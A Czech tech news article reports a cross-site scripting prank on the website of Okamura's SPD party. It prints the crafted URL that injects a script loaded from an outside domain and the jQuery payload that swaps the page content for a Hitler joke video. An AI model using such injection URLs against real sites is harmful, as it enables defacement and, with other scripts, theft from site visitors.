Na stránkách Okamurovy strany se zjevil Hitler. Může za to vtípek s XSS

Na stránkách Okamurovy strany se zjevil Hitler. Může za to vtípek s XSS

Chcete se dozvědět, jak fungují některé útoky typu cross-site scripting (XSS)? V tom případě navštivte tuto upravenou adresu vedoucí na web Okamurovy SPD. Možná to ještě bude fungovat.

Web se sice načte, ale když se podíváte do adresního řádku, je tam drobný kód, který načte externí javascriptový soubor a ten pak už pomocí knihovny jQuery konečně změní původní HTML obsah za vtipné video s Adolfem z YouTube.

Upravená webová adresa, která načte cizí kód:

www.spd.cz/akce?date=2017-09-11%27);$.getScript(%27http://www.krtek.net/spd.js%27);$(%27#kokoti&month=09&year=2017

Kód v externím souboru, který se načetl z cizí domény:

$('.col-md-8 .news').html('<h1>Hitler nebyl uplne spatnej, zabil Hitlera...</h1><iframe width="750" height="421" src="https://www.youtube.com/embed/Qr_TaMfN56c?autoplay=1" frameborder="0" allowfullscreen></iframe>');

Nejedná se o útok v pravém slova smyslu, kdy autor pronikne do systému svého cíle, protože se vše odehrává pouze v prohlížeči surfaře. Mediální efekt ale může být stejný.

Klepněte pro větší obrázek
Web SPD je náchylný k podobným hackům
Diskuze (8) Další článek: Bakterie jsou ve vesmíru mnohem rezistentnější vůči antibiotikům

Témata článku: YouTube, Web, Zajímavosti, Hacking, Politika, Kód, Pravé slovo, Vtípek, Externí soubor, XSS, Okamura, HTML, Vtipné video, Cizí kód, Spd, Adresní řádek, Krtek


Určitě si přečtěte

Kde se bere elektřina v zásuvce? Poznejte 10 tajemství venkovních stožárů s dráty

Kde se bere elektřina v zásuvce? Poznejte 10 tajemství venkovních stožárů s dráty

Elektřina se vyrábí v elektrárnách, ale do zásuvek v našich domovech to pak má ještě hodně daleko. Dnes se na tuhle dlouhou cestu podíváme.

David Polesný | 81

Praktické vychytávky, které si chcete doinstalovat do Windows

Praktické vychytávky, které si chcete doinstalovat do Windows

** Pokud vás nudí vzhled nabídky Start, snadno jej můžete změnit. ** Stejně tak existují programy na přidání záložek do programů. ** Spokojit se ani nemusíte se základním ovládáním hlasitosti.

Vladislav Kluska | 44

Nová americká jaderná puma změní strategii boje

Nová americká jaderná puma změní strategii boje

** Bombardér Northrop Grumman B-2 Spirit amerického letectva nedávno svrhl jadernou pumu ** Šlo o test nové varianty pumy B61-12 ** Ta by měla mít hlavice schopné explodovat se silou 0,3 až 50 kilotun

Stanislav Mihulka | 48

Roboruka se 100 let učila otočit kostičku. Skutečné A.I. se možná nikdy nedočkáme

Roboruka se 100 let učila otočit kostičku. Skutečné A.I. se možná nikdy nedočkáme

** Strojové učení v posledních deseti letech dokázalo divy ** Používáme ho dnes každý den nejen ve vyhledávači ** A přesto se člověku nepřibližuje ani náznakem

Jakub Čížek | 56

Byli tam! Důkazy o přistání na Měsíci, Lunochody i čínská sonda jsou vidět z vesmíru

Byli tam! Důkazy o přistání na Měsíci, Lunochody i čínská sonda jsou vidět z vesmíru

** Sonda LRO pořídila z oběžné dráhy Měsíce zajímavé snímky ** Jsou na nich vidět artefakty všech misí programu Apolla, které přistály na povrchu Měsíce ** Jde například o části lunárních modulů, rovery a dokonce i vlajky

Petr Kubala | 65

Jak a proč používat alternativní DNS: Zrychlí internet a odblokuje weby

Jak a proč používat alternativní DNS: Zrychlí internet a odblokuje weby

** Alternativní DNS servery mohou zpříjemnit surfování na internetu ** Existuje několik ověřených alternativ, nejen známé DNS od Googlu ** Alternativní DNS však mají i své nevýhody, pozor na ně

Petr Březina | 33


Aktuální číslo časopisu Computer

Megatest: 13 grafických karet

Srovnání 7 dokovacích stanic s USB-C

Jak na perfektní noční fotografie

Kvalitní zdroje informací pro sebevzdělávání